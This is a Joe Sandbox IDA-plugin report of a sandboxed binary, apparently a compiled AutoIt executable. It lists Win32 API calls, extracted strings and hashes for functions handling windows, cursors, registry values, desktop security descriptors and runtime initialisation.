                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                    • String ID: ($0$tooltips_class32
                                                                    • API String ID: 698492251-4156429822
                                                                    • Opcode ID: f6fdcbc2a51259700c4e62ce3b284bf4f2e34d08fb18e42b01a58d9aaf2677c3
                                                                    • Instruction ID: ab7c82010646c3e76c941db376efecdecccf7677c9ff78972cfd57d319dfe055
                                                                    • Opcode Fuzzy Hash: f6fdcbc2a51259700c4e62ce3b284bf4f2e34d08fb18e42b01a58d9aaf2677c3
                                                                    • Instruction Fuzzy Hash: 93B18A72608341AFD714DF69C884B6ABBE4FF85350F00891DF99D9B2A1DB71E844CB92
                                                                    Function 008F8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008F8968
                                                                    • GetSystemMetrics.USER32(00000007), ref: 008F8970
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008F899B
                                                                    • GetSystemMetrics.USER32(00000008), ref: 008F89A3
                                                                    • GetSystemMetrics.USER32(00000004), ref: 008F89C8
                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008F89E5
                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008F89F5
                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 008F8A28
                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 008F8A3C
                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 008F8A5A
                                                                    • GetStockObject.GDI32(00000011), ref: 008F8A76
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 008F8A81
                                                                      • Part of subcall function 008F912D: GetCursorPos.USER32(?), ref: 008F9141
                                                                      • Part of subcall function 008F912D: ScreenToClient.USER32(00000000,?), ref: 008F915E
                                                                      • Part of subcall function 008F912D: GetAsyncKeyState.USER32(00000001), ref: 008F9183
                                                                      • Part of subcall function 008F912D: GetAsyncKeyState.USER32(00000002), ref: 008F919D
                                                                    • SetTimer.USER32(00000000,00000000,00000028,008F90FC), ref: 008F8AA8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                    • String ID: AutoIt v3 GUI
                                                                    • API String ID: 1458621304-248962490
                                                                    • Opcode ID: f3a4d3e20d65a3b0dd649a1dd08acc72ea6d9200171b2a1985f3e50df35f9ae9
                                                                    • Instruction ID: e26433267ee8348d56717da6e329af477b32a26ab8367d929a9f56f5fac0102e
                                                                    • Opcode Fuzzy Hash: f3a4d3e20d65a3b0dd649a1dd08acc72ea6d9200171b2a1985f3e50df35f9ae9
                                                                    • Instruction Fuzzy Hash: 6BB19D72A14209EFDB14DFA8DD95BAE3BB5FB48314F104229FA15E7290DB70A940CF51
                                                                    Function 00940D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 009410F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00941114
                                                                      • Part of subcall function 009410F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941120
                                                                      • Part of subcall function 009410F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 0094112F
                                                                      • Part of subcall function 009410F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941136
                                                                      • Part of subcall function 009410F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0094114D
                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00940DF5
                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00940E29
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00940E40
                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00940E7A
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00940E96
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00940EAD
                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00940EB5
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00940EBC
                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00940EDD
                                                                    • CopySid.ADVAPI32(00000000), ref: 00940EE4
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00940F13
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00940F35
                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00940F47
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940F6E
                                                                    • HeapFree.KERNEL32(00000000), ref: 00940F75
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940F7E
                                                                    • HeapFree.KERNEL32(00000000), ref: 00940F85
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940F8E
                                                                    • HeapFree.KERNEL32(00000000), ref: 00940F95
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00940FA1
                                                                    • HeapFree.KERNEL32(00000000), ref: 00940FA8
                                                                      • Part of subcall function 00941193: GetProcessHeap.KERNEL32(00000008,00940BB1,?,00000000,?,00940BB1,?), ref: 009411A1
                                                                      • Part of subcall function 00941193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00940BB1,?), ref: 009411A8
                                                                      • Part of subcall function 00941193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00940BB1,?), ref: 009411B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                    • String ID:
                                                                    • API String ID: 4175595110-0
                                                                    • Opcode ID: 1705eaea50a276dce168911f91caad62fe75a973a9b5c6d3c5963000c9002510
                                                                    • Instruction ID: 020daf13fa3b4524148803b93d1cf63770c0ddc7a950a9c88c1348a881d17bde
                                                                    • Opcode Fuzzy Hash: 1705eaea50a276dce168911f91caad62fe75a973a9b5c6d3c5963000c9002510
                                                                    • Instruction Fuzzy Hash: 52716FB290420AABDF209FA4DC44FAEBBBCBF84300F044169FA19A7191D7359945CBA0
                                                                    Function 0096C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0096C4BD
                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0097CC08,00000000,?,00000000,?,?), ref: 0096C544
                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0096C5A4
                                                                    • _wcslen.LIBCMT ref: 0096C5F4
                                                                    • _wcslen.LIBCMT ref: 0096C66F
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0096C6B2
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0096C7C1
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0096C84D
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0096C881
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0096C88E
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0096C960
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                    • API String ID: 9721498-966354055
                                                                    • Opcode ID: 21a3ef353800a50651ed5fea2a95099884c7a7217b96c02a5f626b4dd8c9f665
                                                                    • Instruction ID: c39bf6e6942ec007eb2f07c387782331859bca75327207e1c18b2389c0fd3979
                                                                    • Opcode Fuzzy Hash: 21a3ef353800a50651ed5fea2a95099884c7a7217b96c02a5f626b4dd8c9f665
                                                                    • Instruction Fuzzy Hash: 921269756082019FDB14DF19C881A2AB7E5FF89714F04885CF99A9B3A2DB31FD41CB82
                                                                    Function 0097091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 009709C6
                                                                    • _wcslen.LIBCMT ref: 00970A01
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00970A54
                                                                    • _wcslen.LIBCMT ref: 00970A8A
                                                                    • _wcslen.LIBCMT ref: 00970B06
                                                                    • _wcslen.LIBCMT ref: 00970B81
                                                                      • Part of subcall function 008FF9F2: _wcslen.LIBCMT ref: 008FF9FD
                                                                      • Part of subcall function 00942BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00942BFA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                    • API String ID: 1103490817-4258414348
                                                                    • Opcode ID: 408b4dd5e23d4aca2928ae5eafcc5041dfdfff6f221cf8dbf896c3602537a658
                                                                    • Instruction ID: bb237c1122d6120cc16094bf79e7dfe023abfa73be446c902dae69fe19dec7e1
                                                                    • Opcode Fuzzy Hash: 408b4dd5e23d4aca2928ae5eafcc5041dfdfff6f221cf8dbf896c3602537a658
                                                                    • Instruction Fuzzy Hash: A9E16632208341CFCB24DF29C45192AB7E5FFD9714F148958F89A9B2A2D730EE45CB82
                                                                    Function 0096C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$BuffCharUpper
                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                    • API String ID: 1256254125-909552448
                                                                    • Opcode ID: 07cb7cb076872b9e5aa78e6f1e1b01786d2129a87a2798f39cb2769b28823ade
                                                                    • Instruction ID: 8c4459560493e6310f950bd8dbcae5e27c133d2ef2dd6cd236751bcfa094dc9b
                                                                    • Opcode Fuzzy Hash: 07cb7cb076872b9e5aa78e6f1e1b01786d2129a87a2798f39cb2769b28823ade
                                                                    • Instruction Fuzzy Hash: B57117B260016A8BCB20DEBCCD516BF3399AFA1754F150528FCE6DB284E635CD40D3A1
                                                                    Function 0097833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 0097835A
                                                                    • _wcslen.LIBCMT ref: 0097836E
                                                                    • _wcslen.LIBCMT ref: 00978391
                                                                    • _wcslen.LIBCMT ref: 009783B4
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 009783F2
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0097361A,?), ref: 0097844E
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00978487
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 009784CA
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00978501
                                                                    • FreeLibrary.KERNEL32(?), ref: 0097850D
                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0097851D
                                                                    • DestroyIcon.USER32(?), ref: 0097852C
                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00978549
                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00978555
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                    • String ID: .dll$.exe$.icl
                                                                    • API String ID: 799131459-1154884017
                                                                    • Opcode ID: 1a17e91991b1d30dc8efcdaa8ec9364956aec7ff4de4caabbba3b9b9366e50be
                                                                    • Instruction ID: 5392ec6da03866de8e1c0166535c5e0d954c4588b977fb8ce0a243bef75b9ab6
                                                                    • Opcode Fuzzy Hash: 1a17e91991b1d30dc8efcdaa8ec9364956aec7ff4de4caabbba3b9b9366e50be
                                                                    • Instruction Fuzzy Hash: 6661D0B2644205BEEB14DF64CC8ABBF77ACFB44B11F108549F919D60E1DBB4A980D7A0
                                                                    Function 008E7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                    • API String ID: 0-1645009161
                                                                    • Opcode ID: 89eed95322d5ec475ff4d535fb3cd7f7d992bc29dbc25cfda25f79198e08a5c2
                                                                    • Instruction ID: 5b4a89b3e3d20b8770132fbfbf269f92867c1f182370e53a97fcd215d91e8236
                                                                    • Opcode Fuzzy Hash: 89eed95322d5ec475ff4d535fb3cd7f7d992bc29dbc25cfda25f79198e08a5c2
                                                                    • Instruction Fuzzy Hash: 4281D171604219BFDB21AF65DC42FAF37A8FF96304F054024F909EA196EB70DA51C7A1
                                                                    Function 00945A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadIconW.USER32(00000063), ref: 00945A2E
                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00945A40
                                                                    • SetWindowTextW.USER32(?,?), ref: 00945A57
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00945A6C
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00945A72
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00945A82
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00945A88
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00945AA9
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00945AC3
                                                                    • GetWindowRect.USER32(?,?), ref: 00945ACC
                                                                    • _wcslen.LIBCMT ref: 00945B33
                                                                    • SetWindowTextW.USER32(?,?), ref: 00945B6F
                                                                    • GetDesktopWindow.USER32 ref: 00945B75
                                                                    • GetWindowRect.USER32(00000000), ref: 00945B7C
                                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00945BD3
                                                                    • GetClientRect.USER32(?,?), ref: 00945BE0
                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 00945C05
                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00945C2F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                    • String ID:
                                                                    • API String ID: 895679908-0
                                                                    • Opcode ID: fc5388e9e77125514346ceddbeb00f9334c3be68c46f9b8a1cad4a65492540d0
                                                                    • Instruction ID: 7cb1cb004e8e70506b8541f405d11df5015674f2eb64001ba2fb0ee8d9f5a1b7
                                                                    • Opcode Fuzzy Hash: fc5388e9e77125514346ceddbeb00f9334c3be68c46f9b8a1cad4a65492540d0
                                                                    • Instruction Fuzzy Hash: C5717C71900B09AFDB20DFA8CE85E6EBBF9FF48704F114A1CE586A25A1D775E940CB10
                                                                    Function 0095FE0E Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 0095FE27
                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 0095FE32
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0095FE3D
                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 0095FE48
                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 0095FE53
                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 0095FE5E
                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 0095FE69
                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 0095FE74
                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 0095FE7F
                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 0095FE8A
                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 0095FE95
                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 0095FEA0
                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0095FEAB
                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 0095FEB6
                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 0095FEC1
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 0095FECC
                                                                    • GetCursorInfo.USER32(?), ref: 0095FEDC
                                                                    • GetLastError.KERNEL32 ref: 0095FF1E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                    • String ID:
                                                                    • API String ID: 3215588206-0
                                                                    • Opcode ID: e6af913c1f453c5094b2ae903202aecb88b7712ddc098077f35e7ecebc97a2ff
                                                                    • Instruction ID: a31d3e990cabc79653c86a48302d20ae88315c6d654857532632417398d6bf96
                                                                    • Opcode Fuzzy Hash: e6af913c1f453c5094b2ae903202aecb88b7712ddc098077f35e7ecebc97a2ff
                                                                    • Instruction Fuzzy Hash: 634172B0D083196ADB10DFBA8C8985EBFE8FF04364B50452AE51DE7281DB78E901CF91
                                                                    Function 009000C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 009000C6
                                                                      • Part of subcall function 009000ED: InitializeCriticalSectionAndSpinCount.KERNEL32(009B070C,00000FA0,1F0F46BC,?,?,?,?,009223B3,000000FF), ref: 0090011C
                                                                      • Part of subcall function 009000ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,009223B3,000000FF), ref: 00900127
                                                                      • Part of subcall function 009000ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,009223B3,000000FF), ref: 00900138
                                                                      • Part of subcall function 009000ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0090014E
                                                                      • Part of subcall function 009000ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0090015C
                                                                      • Part of subcall function 009000ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0090016A
                                                                      • Part of subcall function 009000ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00900195
                                                                      • Part of subcall function 009000ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009001A0
                                                                    • ___scrt_fastfail.LIBCMT ref: 009000E7
                                                                      • Part of subcall function 009000A3: __onexit.LIBCMT ref: 009000A9
                                                                    Strings
                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00900122
                                                                    • kernel32.dll, xrefs: 00900133
                                                                    • SleepConditionVariableCS, xrefs: 00900154
                                                                    • WakeAllConditionVariable, xrefs: 00900162
                                                                    • InitializeConditionVariable, xrefs: 00900148
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                    • API String ID: 66158676-1714406822
                                                                    • Opcode ID: 7918f89307d60963ad5baefd8b02c012ae62bbc02a9ec8af9477d2c2bda33536
                                                                    • Instruction ID: 0c25e94b647f3e5a6ba9e183c9b154ee8945522f122c3881eed56263b03707cd
                                                                    • Opcode Fuzzy Hash: 7918f89307d60963ad5baefd8b02c012ae62bbc02a9ec8af9477d2c2bda33536
                                                                    • Instruction Fuzzy Hash: F821297365C7106FD7205BB4AC4AB6A73A8EFC6B64F00413AF909E72D1DF7098009A90
                                                                    Function 009430F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
